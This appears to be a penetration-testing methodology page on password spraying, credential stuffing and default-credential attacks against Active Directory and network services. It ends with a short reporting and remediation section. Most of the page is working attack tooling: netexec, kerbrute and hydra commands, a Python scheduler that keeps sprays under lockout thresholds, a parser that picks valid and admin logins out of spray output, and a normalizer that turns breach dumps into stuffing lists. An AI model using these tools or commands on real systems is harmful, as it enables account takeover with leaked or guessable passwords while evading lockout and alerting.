🛡️ Methodology Checklist
- Spraying: one or few passwords against many users (avoid lockout)
- Credential stuffing: leaked cred pairs from breach databases
- Get exact lockout policy before spraying
- Build username list: email format, AD enum, LinkedIn, Kerbrute
- Select spray password: Season+Year (Summer2024), CompanyName+1
- Spray with Kerbrute: `kerbrute passwordspray -d [DOMAIN] --dc [DC] users.txt [PASS]`
- NXC spray: `nxc smb [DC] -u users.txt -p [PASS] --continue-on-success`
- Wait the full observation window between rounds
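The "get the exact lockout policy" and "wait the full observation window" items above are where sprays go wrong in practice. The following is an added example, not code from the original page or from any of the tools it names: it turns a lockout threshold and reset window (as read from, for instance, `nxc smb [DC] -u [USER] -p [PASS] --pass-pol`) into a round schedule, then checks that schedule against a model of how Active Directory increments and resets badPwdCount. The policy values, candidate passwords, the two-attempt safety margin and the five-minute extra wait are constructed assumptions for illustration.

```python
# Added example (not from the original page): derive a spray schedule from the
# domain lockout policy and check it against a model of how AD counts bad
# passwords before anything is actually sprayed. Policy numbers and passwords
# below are constructed for illustration.

def plan_spray(passwords, threshold, reset_window_min,
               keep_below=2, stagger_min=1, margin_min=5):
    """Return [(offset_minutes, password), ...] for a spray that never locks out.

    Each password is at most one failed attempt per account, so a round may
    contain at most `threshold - keep_below` passwords. The next round starts
    `reset_window_min + margin_min` after the LAST attempt of the previous
    round, because AD resets badPwdCount only once that long has passed since
    the last failure. keep_below=2 (room for the user's own typos) and the
    5-minute margin are assumptions, not policy values.
    """
    if threshold <= 0:                      # 0 = lockout disabled: no waiting needed
        return [(i * stagger_min, pw) for i, pw in enumerate(passwords)]
    per_round = max(1, threshold - keep_below)
    plan, t = [], 0
    for i, pw in enumerate(passwords):
        if i and i % per_round == 0:
            t += reset_window_min + margin_min   # wait out the window after the last attempt
        elif i:
            t += stagger_min                     # spacing between passwords inside a round
        plan.append((t, pw))
    return plan


def simulate_bad_pwd_count(plan, threshold, reset_window_min):
    """Worst case for one account for which every sprayed password is wrong.

    Models badPwdCount: +1 per failure, reset to 0 once `reset_window_min`
    minutes have elapsed since the previous failure, lockout when the count
    reaches `threshold`. Returns (peak_count, locked_out).
    """
    count, last_fail, peak = 0, None, 0
    for t, _pw in plan:
        if last_fail is not None and t - last_fail >= reset_window_min:
            count = 0
        count += 1
        last_fail = t
        peak = max(peak, count)
        if threshold > 0 and count >= threshold:
            return peak, True
    return peak, False


# Constructed policy: 5 attempts, counter reset after 30 minutes.
POLICY = {"threshold": 5, "reset_window_min": 30}
CANDIDATES = ["Summer2024", "Summer2024!", "Winter2024", "ChangeMe123!",
              "Welcome1!", "Password1", "Corp2024!", "Corp1!"]

if __name__ == "__main__":
    safe = plan_spray(CANDIDATES, stagger_min=2, **POLICY)
    for offset, pw in safe:
        # One round entry per line: run e.g.
        #   nxc smb [DC] -u users.txt -p "$pw" --continue-on-success
        # at that many minutes after the start.
        print(f"t+{offset:>3} min  {pw}")
    print("worst-case badPwdCount / locked:", simulate_bad_pwd_count(safe, **POLICY))
    naive = [(i, pw) for i, pw in enumerate(CANDIDATES)]   # one per minute, no pauses
    print("naive schedule:", simulate_bad_pwd_count(naive, **POLICY))
```

With the constructed policy the safe schedule tries three passwords per round and pauses 35 minutes between rounds, peaking at a badPwdCount of 3; the naive one-per-minute schedule locks every account at the fifth password. Re-run the simulation whenever the policy changes (fine-grained password policies can give service accounts a different threshold than users).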
🎯 Operational Context
Use when: Large user list available — spray common passwords at low volume across all accounts, or stuff breach credentials against all services.
Think Dumber First: Credential stuffing is the highest-ROI attack; breached credential lists typically show a 1-5% reuse rate against the target. `nxc smb [TARGET] -u emails.txt -p pass.txt --no-bruteforce --continue-on-success` pairs line N of the user file with line N of the password file, so each account sees exactly one attempt and the lockout threshold is never approached. Run stuffing before spraying.
Skip when: User list unavailable — enumerate users first before any spray.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| netexec smb [SUBNET]/24 -u [USER_LIST] -p '[PASS]' --continue-on-success | Spray a single password across a subnet (without the flag nxc stops at the first valid login per host) |
| hydra -C [CRED_LIST] ssh://[TARGET_IP] | Credential stuffing (-C takes one user:pass per line) |
| pip3 install defaultcreds-cheat-sheet | Install the default-credential lookup tool |
| creds search [PRODUCT] | Look up default creds for a product/vendor |
🔬 Deep Dive & Workflow
Password Spraying vs Brute-Force vs Stuffing
| Technique | Input | Targets | Lockout Risk |
|---|---|---|---|
| Brute-force | Many passwords → one account | Single user | High |
| Spraying | One password → many accounts | Entire org | Low |
| Stuffing | Breach pairs (user:pass) → service | Any protocol | Low |
Password Spraying
Test a single password against many accounts — exploits organizations that initialize accounts with a standard password and users who never change it.
Common spray targets: ChangeMe123!, Welcome1!, Season+Year, CompanyName1!
```bash
# Spray a single password across an entire subnet; keep going after the first hit
netexec smb 10.100.38.0/24 -u users.list -p 'ChangeMe123!' --continue-on-success
```
Watch for (Pwn3d!) in the output: it marks a valid login that is also local administrator on that host. In Active Directory environments, Kerbrute is an alternative that validates through Kerberos pre-authentication instead of an SMB/NTLM logon. Failed pre-auth still increments badPwdCount and is logged on the DC as event 4771 rather than 4776/4625, so it avoids the noisiest logon-failure telemetry but is neither invisible nor exempt from lockout.
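Reading spray output by eye misses the results that matter second-most after (Pwn3d!): the NT statuses that mean the password was right but the account cannot log on this way, and STATUS_ACCOUNT_LOCKED_OUT, which means the round must stop. The following is an added example, not code from the original page or from NXC: it parses nxc-style SMB output and buckets every attempt. The output lines are constructed sample data in nxc's one-line-per-attempt format, and the list of "password accepted but restricted" statuses is the usual practitioner set rather than something the page defines.

```python
# Added example (not from the original page): parse nxc/netexec SMB spray
# output and triage every line, so that admin hits, plain valid logins and
# "password correct but account restricted" results are all recorded and a
# lockout is noticed immediately. NXC_OUTPUT is constructed sample data.
import re

NXC_OUTPUT = r"""
SMB         10.100.38.5     445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         10.100.38.5     445    DC01             [+] corp.local\jsmith:ChangeMe123! (Pwn3d!)
SMB         10.100.38.5     445    DC01             [-] corp.local\bjones:ChangeMe123! STATUS_LOGON_FAILURE
SMB         10.100.38.5     445    DC01             [-] corp.local\mlee:ChangeMe123! STATUS_ACCOUNT_RESTRICTION
SMB         10.100.38.5     445    DC01             [-] corp.local\svc_old:ChangeMe123! STATUS_PASSWORD_EXPIRED
SMB         10.100.38.5     445    DC01             [+] corp.local\svc_backup:ChangeMe123!
SMB         10.100.38.5     445    DC01             [-] corp.local\tnguyen:ChangeMe123! STATUS_ACCOUNT_LOCKED_OUT
"""

# proto, ip, port, host, [+]/[-], DOMAIN\user:password, optional STATUS_*, optional (Pwn3d!)
LINE = re.compile(
    r"^(?P<proto>\S+)\s+(?P<ip>\S+)\s+\d+\s+(?P<host>\S+)\s+\[(?P<mark>[+-])\]\s+"
    r"(?P<domain>[^\\]+)\\(?P<user>[^:]+):(?P<password>.*?)"
    r"(?:\s+(?P<status>STATUS_\w+))?(?:\s+\((?P<pwn>Pwn3d!)\))?\s*$"
)

# Statuses the DC returns only AFTER the password has been accepted
# (assumption: the commonly used practitioner list).
PASSWORD_OK_BUT_RESTRICTED = {
    "STATUS_ACCOUNT_RESTRICTION", "STATUS_ACCOUNT_DISABLED", "STATUS_ACCOUNT_EXPIRED",
    "STATUS_PASSWORD_EXPIRED", "STATUS_PASSWORD_MUST_CHANGE",
    "STATUS_INVALID_LOGON_HOURS", "STATUS_INVALID_WORKSTATION",
}

def triage(output):
    """Bucket each attempt line; banner lines ([*]) are ignored.

    Returns lists of 'DOMAIN\\user' per bucket plus a stop flag that is set
    when any account reports STATUS_ACCOUNT_LOCKED_OUT: the DC returns that
    whether or not the password was right, so the spray must pause."""
    result = {"admin": [], "valid": [], "restricted": [], "locked": [], "failed": [], "stop": False}
    for line in output.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        account = f"{m['domain']}\\{m['user']}"
        status = m["status"]
        if m["mark"] == "+":
            result["admin" if m["pwn"] else "valid"].append(account)
        elif status == "STATUS_ACCOUNT_LOCKED_OUT":
            result["locked"].append(account)
            result["stop"] = True
        elif status in PASSWORD_OK_BUT_RESTRICTED:
            result["restricted"].append((account, status))
        else:
            result["failed"].append(account)
    return result

if __name__ == "__main__":
    r = triage(NXC_OUTPUT)
    for bucket in ("admin", "valid", "restricted", "locked"):
        print(f"{bucket:>10}: {r[bucket]}")
    if r["stop"]:
        print("lockout observed: stop spraying and wait out the reset window")
```

Pipe the spray's saved output through this after every round: the "restricted" bucket goes into the report as valid credentials (and is worth retrying against other hosts, since logon-hours and workstation restrictions are evaluated per target), and a non-empty "locked" bucket means the policy was misjudged and the next round has to wait.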
Credential Stuffing
Reuse credentials from known breaches against the target. The -C flag in Hydra accepts user:password per line:
```bash
# user_pass.list format, one pair per line: "admin:password123"
hydra -C user_pass.list ssh://[TARGET_IP]
```
Effective because users reuse passwords across personal and enterprise accounts.
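Breach dumps rarely arrive in the exact `user:pass` shape Hydra's `-C` and nxc's `--no-bruteforce` expect: separators vary, e-mail case varies, some passwords contain the separator character, and records for other domains are noise. The following is an added example, not code from the original page or from Hydra or NXC: it normalizes a dump into index-aligned user and password lists. The dump lines and the domain `corp.example` are constructed sample data.

```python
# Added example (not from the original page): normalize a breach dump into the
# aligned user/password lists that `nxc --no-bruteforce` and `hydra -C` expect.
# RAW_DUMP is constructed sample data, not real breach records.
import re

RAW_DUMP = """\
jsmith@corp.example:Summer2023!
JSmith@corp.example;Summer2023!
bjones@corp.example:p@ss:word   
mlee@gmail.com:hunter2
nobody@corp.example
svc_backup@CORP.EXAMPLE:Backup#2022
"""

def parse_dump(text, target_domain=None):
    """Return a de-duplicated list of (user, password) pairs.

    - Splits on the FIRST ':' or ';' only, so passwords containing ':' survive.
    - Trailing whitespace is stripped (dump artefact); inner spaces are kept.
    - Lowercases the user (logon names are case-insensitive; passwords are not).
    - Drops lines with no separator and, if target_domain is given, other domains.
    """
    seen, pairs = set(), []
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line:
            continue
        m = re.match(r"^([^:;]+)[:;](.*)$", line)
        if not m:
            continue
        user, pw = m.group(1).strip().lower(), m.group(2)
        if target_domain and not user.endswith("@" + target_domain):
            continue
        key = (user, pw)
        if key not in seen:
            seen.add(key)
            pairs.append(key)
    return pairs

def stuffing_files(pairs, email_variant=True):
    """Return (users, passwords) with index-aligned entries.

    With email_variant=True each pair is emitted twice, once as the address
    and once as the local part (sAMAccountName form), because either may be
    the logon name; that is still one attempt per candidate username."""
    users, pws = [], []
    for user, pw in pairs:
        users.append(user); pws.append(pw)
        if email_variant and "@" in user:
            users.append(user.split("@", 1)[0]); pws.append(pw)
    return users, pws

if __name__ == "__main__":
    users, pws = stuffing_files(parse_dump(RAW_DUMP, "corp.example"))
    with open("users.txt", "w") as fu, open("pws.txt", "w") as fp:
        fu.write("\n".join(users) + "\n")
        fp.write("\n".join(pws) + "\n")
    # then: nxc smb [DC] -u users.txt -p pws.txt --no-bruteforce --continue-on-success
    # or, for hydra -C: print one "user:pass" line per index instead.
```

The two output files must stay line-aligned; sorting or de-duplicating only one of them silently turns a stuffing run into a brute-force and can trip the lockout threshold the page's table says stuffing avoids.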
Default Credentials
Devices (routers, firewalls, databases, IoT) often ship with factory credentials left unchanged.
DefaultCreds-Cheat-Sheet queries a curated database of known defaults:
```bash
pip3 install defaultcreds-cheat-sheet
creds search linksys
creds search cisco
creds search mysql
```
Common defaults to try first: admin:admin, admin:password, admin:<blank>, root:root.
Attack workflow:
- Identify the product/version from service banners or the web login page
- Run `creds search [PRODUCT]` for candidates
- Build a user:pass list from the results
- Spray it with `hydra -C default_creds.list [PROTOCOL]://[TARGET_IP]`
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Spray lockout triggered | Observation window miscalculated or too many passwords per round | Stop immediately; wait out the full reset window; then run fewer passwords per round and space rounds at least 2x the policy window apart |
| Stuffing returns no valid creds | Breach data stale or wrong format | Normalize to username:password, one per line (split on the first separator only); try the e-mail form if the bare username fails, and vice versa |
| nxc stops after the first valid login on a host | --continue-on-success not set | Add the flag to collect every valid account instead of only the first match |
| Too many invalid users slow spray | User list too large | Validate users first (Kerbrute userenum, LDAP, SMTP VRFY); remove invalid users before spraying |
| Spray shows STATUS_ACCOUNT_RESTRICTION (or STATUS_PASSWORD_MUST_CHANGE / STATUS_PASSWORD_EXPIRED / STATUS_ACCOUNT_DISABLED) | Password is correct but the account cannot log on this way | Record it as a valid credential for reporting; retry it on other protocols or hosts (logon-hours and workstation restrictions are evaluated per target); do not count it as a failure |
📝 Reporting Trigger
Finding Title: Password Spraying Compromises Multiple Domain Accounts
Impact: A low-volume password spray across all domain accounts stays under the lockout threshold while compromising every account that uses a common password, giving initial or expanded AD access without triggering lockout alerts.
Root Cause: Weak, guessable passwords (Season+Year, CompanyName1!) are permitted; the lockout policy allows several attempts per reset window (threshold >10) so each spray round is free; no alerting on low-volume authentication failures distributed across many accounts; no MFA.
Recommendation: Set the lockout threshold to 3-5 attempts with a 15-30 minute observation window, weighing the self-inflicted denial-of-service risk. Implement smart lockout (Microsoft Entra ID smart lockout and Entra ID Protection). Alert on distributed failed-authentication patterns (one source, many accounts, one attempt each). Mandate MFA for all domain accounts.